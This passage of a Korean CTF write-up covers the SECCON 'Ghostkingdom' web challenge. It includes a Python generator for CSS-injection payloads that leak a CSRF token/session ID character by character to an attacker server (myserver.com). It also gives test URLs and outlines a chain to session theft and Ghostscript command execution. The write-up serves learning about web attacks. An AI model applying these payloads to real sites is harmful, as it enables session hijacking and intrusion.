<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># css payload generator ()</span></span><br><span class="line"><span class="keyword">from</span> base64 <span class="keyword">import</span> b64encode <span class="keyword">as</span> enc</span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line"></span><br><span class="line">payloads = []</span><br><span class="line">hex_chrs = <span class="string">'0123456789abcdef'</span></span><br><span class="line">fmt = <span class="string">"input[value^='%s'] &#123; background-image: url('http://myserver.com/%s') &#125;"</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> c <span class="keyword">in</span> hex_chrs:</span><br><span class="line">    prefix = <span class="string">""</span></span><br><span class="line">    <span class="keyword">if</span> len(sys.argv) &gt; <span class="number">1</span>:</span><br><span class="line">        prefix += sys.argv[<span class="number">1</span>]</span><br><span class="line">    payload = fmt % (prefix + c, c)</span><br><span class="line">    payloads.append(payload)</span><br><span class="line"></span><br><span class="line">css = <span class="string">'\n'</span>.join(payloads)</span><br><span class="line"><span class="keyword">print</span> enc(css)</span><br><span class="line"><span class="comment"># prints base64-encoded css payload =&gt; copy it into /?action=msgadm2&amp;css=&#123;here&#125;</span></span><br></pre></td></tr></table></figure>
<hr>
<p><em>Fact 1 : 어떻게든 local network에서 menu에 들어갔을 때의 html 소스를 확인해서, upload image에 해당하는 action 파라미터 값을 알아내야 한다.</em></p>
<p><em>Fact 2 : <code>/?action=msgadm2</code> 에서 CSS Injection이 터질 수 있다!</em></p>
<p><em>+ Fact 3 : <code>/?action=msgadm2</code> 에서 CSS injection을 통해 CSRF token == CGISESSID 를 얻을 수 있다!</em></p>
<p><em>+ Fact 4 : local user로 하여금 <code>/?action=msgadm2&amp;css={our_css_payload}</code> 로 접근하게 하면 local user의 세션을 얻을 수 있다!</em></p>
<hr>
<p>그럼 이제 Fact 4 에서 언급한 대로 local user가 <code>/?action=msgadm2&amp;css={our_css_payload}</code> 에 접근하도록 하기만 하면 된다.</p>
<p>그리고 <code>/?action=msgadm2</code> 페이지를 다시 보면,</p>
<img src="/2019/01/05/ghost-kingdom-writeup/img/image-20181028194054606.png">
<p><code>Send to admin</code> 버튼이 있다, 눌러봅시다!</p>
<img src="/2019/01/05/ghost-kingdom-writeup/img/image-20181028232246130.png">
<p>Send to admin 버튼을 눌렀을 때 서버에 보내지는 request의 헤더는 다음과 같다.</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">Request Header :</span><br><span class="line">	URL : /?</span><br><span class="line">	Query String Parameter :</span><br><span class="line">		csrf : 6396e3e7324ddc73f4d313</span><br><span class="line">		action : msgadm3</span><br><span class="line">	Referer : http://ghostkingdom.pwn.seccon.jp/?css=c3BhbntiYWNrZ3JvdW5kLWNvbG9yOnJlZDtjb2xvcjp5ZWxsb3d9&amp;msg=%3C%3E%27%22%26%5C%21&amp;action=msgadm2</span><br></pre></td></tr></table></figure>
<p>그리고 잘못된 csrf를 보내면 CSRF 에러 메시지를 출력한다.</p>
<p>여기서 우리는 msgadm3의 루틴에 대해 다음과 같은 예상을 해볼 수 있다.</p>
<ul>
<li>CSRF가 유효한 지 체크를 한다. (아마 CGISESSID가 서버에서 유효한 지 체크하고, CSRF가 CGISESSID 값과 같은 지 체크할 것이다.)</li>
<li>admin brower로 하여금 Referer에 적힌 주소에 접근을 하게 한다.</li>
</ul>
<blockquote>
<p>그럼 이걸로 우리가 만든 css payload (base64-encoded) 를 admin이 읽게 하면 admin의 session id를 얻을 수 있고, admin은 아마도 local user 일 것이므로 upload image에 접근할 수 있게 되지 않을까?</p>
</blockquote>
<p>우선 admin에게 CSS injection이 잘 되는지, 즉 admin이 <code>/?action=msgadm2&amp;msg=asdf&amp;css=</code>에 접근을 하는지 확인하기 위해 다음을 css payload로 해서 send to admin 버튼을 눌러보았다.</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">base64-encode(&apos;span&#123;background-color: url(&quot;http://myserver.com/&quot;)&#125;&apos;) = &apos;c3BhbntiYWNrZ3JvdW5kLWNvbG9yOiB1cmwoImh0dHA6Ly9teXNlcnZlci5jb20vIil9&apos;</span><br><span class="line"></span><br><span class="line">Browse to</span><br><span class="line"></span><br><span class="line">http://ghostkingdom.pwn.seccon.jp/?action=msgadm2&amp;msg=asdf&amp;css=c3BhbntiYWNrZ3JvdW5kLWNvbG9yOiB1cmwoImh0dHA6Ly9teXNlcnZlci5jb20vIil9</span><br><span class="line"></span><br><span class="line">and then click the &apos;Send to admin&apos; button</span><br><span class="line"></span><br><span class="line">If admin goes to above url, myserver.com should get only one HTTP request by url(&quot;http://myserver.com/&quot;)...</span><br></pre></td></tr></table></figure>
<p><em>결과 : <span style="color:red">No requests - msgadm3 은 의미가 없다.</span></em></p>
<p>누군가가 <a href="http://ghostkingdom.pwn.seccon.jp/?action=msgadm2&amp;msg=asdf&amp;css=c3BhbntiYWNrZ3JvdW5kLWNvbG9yOiB1cmwoImh0dHA6Ly9teXNlcnZlci5jb20vIil9" target="_blank" rel="noopener">http://ghostkingdom.pwn.seccon.jp/?action=msgadm2&amp;msg=asdf&amp;css=c3BhbntiYWNrZ3JvdW5kLWNvbG9yOiB1cmwoImh0dHA6Ly9teXNlcnZlci5jb20vIil9</a> 에 접근하면 무조건 우리 서버에 request가 전달이 되는데, 아무리 기다려봐도 우리 서버에는 admin의 것으로 보이는 request가 전달이 되지 않았다.</p>
<hr>
<p><em>Fact 1 : 어떻게든 local network에서 menu에 들어갔을 때의 html 소스를 확인해서, upload image에 해당하는 action 파라미터 값을 알아내야 한다.</em></p>
<p><em>Fact 2 : <code>/?action=msgadm2</code> 에서 CSS Injection이 터질 수 있다!</em></p>
<p><em>Fact 3 : <code>/?action=msgadm2</code> 에서 CSS injection을 통해 CSRF token == CGISESSID 를 얻을 수 있다!</em></p>
<p><em>Fact 4 : local user로 하여금 <code>/?action=msgadm2&amp;css={our_css_payload}</code> 로 접근하게 하면 local user의 세션을 얻을 수 있다!</em></p>
<p><em>+ Fact 5 : <code>/?action=msgadm3</code> 는 의미가 없다.</em></p>
<hr>
<p>Main menu에 있든 첫 번째 기능인 <code>Message to admin</code> 은 위의 정보들로 일단 만족하고, 이제 두 번째 기능인 <code>Take a screenshot</code> 기능을 살펴보자.</p>
<h3 id="4-Taking-a-screenshot-action-sshot"><a href="#4-Taking-a-screenshot-action-sshot" class="headerlink" title="4. Taking a screenshot /?action=sshot"></a>4. Taking a screenshot <code>/?action=sshot</code></h3><p>local network</p>
<img src="/2019/01/05/ghost-kingdom-writeup/img/image-20181028233954788.png">
<h3 id="5-결론"><a href="#5-결론" class="headerlink" title="5. 결론"></a>5. 결론</h3><p>서버가 닫혀버려서 더 이상 진행을 못하네요 ㅠㅠ<br>결론을 말하자면, screenshot의 url에 CSS injection이 되는 /?action=msgadm2&amp;css={our_css_payload}를 넣어줘서 local user의 CGISESSID를 획득하고, 그 CGISESSID로 사이트에 접속을 하면 upload image 기능에 접근할 수 있게 된다.<br>upload image에서는 Ghostscript를 사용하는 것을 확인할 수 있고, tokyowesterns ctf 2018에 출제된 <a href="https://gitlab.com/mahham/ctf/blob/master/2018-twctf/Readme.md#slack-emoji-converter-267-web" target="_blank" rel="noopener">slack-emoji-converter</a> 문제를 참고, <a href="https://www.exploit-db.com/exploits/45243/" target="_blank" rel="noopener">exploit-db</a> 에 올라온 익스를 CENTOS 버전으로 그대로 사용하면 shell command를 실행할 수 있다.</p>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="../../../../index.html">Home</a></li>
         
          <li><a href="../../../../about/">About</a></li>
         
          <li><a href="../../../../archives/">Writing</a></li>
         
          <li><a href="../../../../categories/">categories</a></li>
         
          <li><a href="../../../../tags/">tags</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#Ghostkingdom-248-point"><span class="toc-number">1.</span> <span class="toc-text">Ghostkingdom (248 point)</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Problem-description"><span class="toc-number">1.1.</span> <span class="toc-text">Problem description :</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Website-details"><span class="toc-number">1.2.</span> <span class="toc-text">Website details :</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1-Login-step"><span class="toc-number">1.2.1.</span> <span class="toc-text">1. Login step :</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-Main-menu-action-menu"><span class="toc-number">1.2.2.</span> <span class="toc-text">2. Main menu /?action=menu</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#3-Message-to-admin-action-msgadm-기능-분석"><span class="toc-number">1.2.3.</span> <span class="toc-text">3. Message to admin /?action=msgadm 기능 분석</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#CSS-injection으로-뭘-할-수-있을까…"><span class="toc-number">1.3.</span> <span class="toc-text">CSS injection으로 뭘 할 수 있을까…</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#4-Taking-a-screenshot-action-sshot"><span class="toc-number">1.3.1.</span> <span class="toc-text">4. Taking a screenshot /?action=sshot</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#5-결론"><span class="toc-number">1.3.2.</span> <span class="toc-text">5. 결론</span></a></li></ol></li></ol></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" href="http://www.facebook.com/sharer.php?u=http://yoursite.com/2019/01/05/ghost-kingdom-writeup/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://twitter.com/share?url=http://yoursite.com/2019/01/05/ghost-kingdom-writeup/&text=ghost-kingdom-writeup"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.linkedin.com/shareArticle?url=http://yoursite.com/2019/01/05/ghost-kingdom-writeup/&title=ghost-kingdom-writeup"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://pinterest.com/pin/create/bookmarklet/?url=http://yoursite.com/2019/01/05/ghost-kingdom-writeup/&is_video=false&description=ghost-kingdom-writeup"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=ghost-kingdom-writeup&body=Check out this article: http://yoursite.com/2019/01/05/ghost-kingdom-writeup/"><i class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://getpocket.com/save?url=http://yoursite.com/2019/01/05/ghost-kingdom-writeup/&title=ghost-kingdom-writeup"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://reddit.com/submit?url=http://yoursite.com/2019/01/05/ghost-kingdom-writeup/&title=ghost-kingdom-writeup"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.stumbleupon.com/submit?url=http://yoursite.com/2019/01/05/ghost-kingdom-writeup/&title=ghost-kingdom-writeup"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://digg.com/submit?url=http://yoursite.com/2019/01/05/ghost-kingdom-writeup/&title=ghost-kingdom-writeup"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.tumblr.com/share/link?url=http://yoursite.com/2019/01/05/ghost-kingdom-writeup/&name=ghost-kingdom-writeup&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fas fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy; 2019 Dongpyeong Seo
  </div>
  <div class="footer-right">
    <nav>
      <ul>
         
          <li><a href="../../../../index.html">Home</a></li>
         
          <li><a href="../../../../about/">About</a></li>
         
          <li><a href="../../../../archives/">Writing</a></li>
         
          <li><a href="../../../../categories/">categories</a></li>
         
          <li><a href="../../../../tags/">tags</a></li>
        
      </ul>
    </nav>
  </div>
</footer>

    </div>
</body>
</html>
<!-- styles -->
<link rel="stylesheet" href="../../../../lib/font-awesome/css/all.min.css">
<link rel="stylesheet" href="../../../../lib/justified-gallery/css/justifiedGallery.min.css">

<!-- jquery -->
<script src="../../../../lib/jquery/jquery.min.js"></script>
<script src="../../../../lib/justified-gallery/js/jquery.justifiedGallery.min.js"></script>
<script src="../../../../js/main.js"></script>
<!-- search -->

<!-- Google Analytics -->

<!-- Baidu Analytics -->

<!-- Disqus Comments -->


